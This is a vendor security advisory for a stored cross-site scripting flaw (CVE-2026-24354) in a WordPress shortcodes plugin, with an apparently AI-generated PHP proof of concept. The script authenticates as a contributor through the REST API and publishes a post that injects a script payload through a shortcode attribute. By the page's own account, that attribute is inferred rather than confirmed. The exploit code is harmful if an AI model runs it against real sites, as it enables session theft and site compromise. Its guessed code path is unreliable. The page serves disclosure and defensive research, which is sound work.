Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-24354: Penci Shortcodes & Performance <= 6.1 – Authenticated (Contributor+) Stored Cross-Site Scripting (penci-shortcodes)

CVE ID CVE-2026-24354
Plugin penci-shortcodes
Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 6.1
Patched Version
Disclosed January 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24354 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Penci Shortcodes & Performance WordPress plugin, affecting versions up to and including 6.1. The vulnerability allows users with contributor-level permissions or higher to inject arbitrary JavaScript into site pages, which then executes for any visitor viewing the compromised content. The CVSS score of 6.4 (Medium) reflects its network-based attack vector, low attack complexity, and requirement for low-privilege authentication, with scope change and impacts on confidentiality and integrity.

Atomic Edge research infers the root cause is insufficient input sanitization and output escaping, as indicated by the CWE-79 classification and the vulnerability description. The plugin likely fails to properly validate or escape user-supplied input within one of its shortcode handlers or content processing functions before storing it in the database. This inference is based on the plugin’s purpose of providing shortcodes and the stored nature of the attack. The exact vulnerable code path is not confirmed without source code analysis.

Exploitation requires an attacker to possess a WordPress account with at least contributor-level privileges. The attacker would likely inject a malicious script payload into post or page content via a plugin shortcode parameter, a custom field, or a content block processed by the plugin. A typical payload might be `alert(document.cookie)` or a more sophisticated script to steal session cookies. The malicious content is saved when the post is drafted or published. The script executes in the browsers of all users who later view the affected page.

Effective remediation requires implementing proper input validation and output escaping. The patched version 6.2 likely added calls to WordPress sanitization functions like `sanitize_text_field()` or `wp_kses()` on user input before storage. It also likely added output escaping functions like `esc_html()` or `esc_attr()` when rendering shortcode attributes or other dynamic content. A comprehensive fix must ensure all user-controllable data is treated as untrusted at both input and output stages.

Successful exploitation leads to client-side code execution in the context of the vulnerable site. Attackers can hijack user sessions, deface websites, perform actions on behalf of authenticated users, or redirect visitors to malicious sites. The impact is amplified because the payload is stored persistently and executes for every page view. Contributor-level access is relatively easy to obtain, increasing the practical risk for sites with open user registration or compromised accounts.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-24354 - Penci Shortcodes & Performance <= 6.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
<?php
/**
 * Proof-of-concept for stored XSS in Penci Shortcodes & Performance plugin.
 * This script simulates an authenticated contributor submitting a post containing a malicious shortcode payload.
 * The exact vulnerable shortcode parameter is inferred from the plugin's functionality and CWE.
 * Assumptions:
 * 1. The target site has the vulnerable plugin (<=6.1) installed.
 * 2. The attacker has valid contributor-level credentials.
 * 3. The plugin has a shortcode that insecurely outputs an attribute without escaping.
 * 4. The WordPress REST API is available for post creation.
 */

$target_url = 'https://target-site.com'; // CHANGE THIS
$username = 'contributor_user'; // CHANGE THIS
$password = 'contributor_pass'; // CHANGE THIS

// Payload: A simple alert to demonstrate script execution.
// In a real attack, this would be a script to steal cookies or session tokens.
$xss_payload = '"><script>alert(`Atomic Edge XSS Test: ${document.domain}`)</script>';

// Simulate a post containing a malicious shortcode.
// The plugin slug 'penci-shortcodes' suggests shortcodes like [penci_something].
// We assume a shortcode with a vulnerable 'title' or 'custom' attribute.
$malicious_content = "This is a test post with an exploited shortcode.nn[penci_box custom="{$xss_payload}"]Malicious content here[/penci_box]";

$api_endpoint = $target_url . '/wp-json/wp/v2/posts';

// Step 1: Authenticate to get a nonce or REST API authentication token.
// For REST API, we use Basic Auth for simplicity in PoC. Real sites may use cookies or JWT.
$auth_header = 'Authorization: Basic ' . base64_encode($username . ':' . $password);

// Step 2: Create a new post as a contributor with the malicious content.
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $api_endpoint,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST => true,
    CURLOPT_HTTPHEADER => [
        'Content-Type: application/json',
        $auth_header
    ],
    CURLOPT_POSTFIELDS => json_encode([
        'title' => 'Test Post - CVE-2026-24354',
        'content' => $malicious_content,
        'status' => 'publish' // Contributor can publish if they have permission, otherwise use 'draft'.
    ])
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code >= 200 && $http_code < 300) {
    $resp_data = json_decode($response, true);
    $post_id = $resp_data['id'] ?? 'unknown';
    $post_url = $resp_data['link'] ?? $api_endpoint . '/' . $post_id;
    echo "[+] Post created successfully. ID: {$post_id}n";
    echo "[+] Visit the post to trigger XSS: {$post_url}n";
} else {
    echo "[-] Post creation failed. HTTP Code: {$http_code}n";
    echo "[-] Response: {$response}n";
    echo "[*] Note: Contributor may need to save as 'draft'. Adjust the 'status' parameter if needed.n";
}
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School